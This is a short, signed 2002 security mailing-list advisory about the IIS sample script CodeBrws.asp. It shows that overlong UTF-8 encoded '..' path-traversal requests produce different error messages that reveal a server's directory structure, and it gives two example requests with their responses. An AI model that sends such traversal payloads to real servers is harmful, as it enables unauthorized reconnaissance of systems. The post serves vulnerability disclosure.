-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 This vulnerability can also be used to determine the directory structure of an affected system. When an attempt is made to access a non-existent ASP file outside the 'IISamples' root, CodeBrws.asp will respond differently based on whether or not the path to the file is valid. Below is an example: Request: http://192.168.x.x/IISSamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp Response: Microsoft VBScript runtime (0x800A004C) Path not found Request: http://192.168.x.x/IISSamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/oracle/nonexistant.asp Response: Microsoft VBScript runtime (0x800A0035) File not found Credits go to Tas Giakouminakis for discovering this. - Joe Testa GPG key: http://www.cs.rit.edu/~jst3290/joetesta_r7.pub A22B 2683 C40E 5443 AE52 AD6D 65B2 F5DF 4B11 06B4 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE8vbj5ZbL130sRBrQRAj1QAJ9rFZH5aJnSjZwpijO4zRhr2bnmeACgu5Tz DE4zfFekNxFjYlg6/H5KtyA= =8vyn -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Wed Apr 17 2002 - 14:58:40 PDT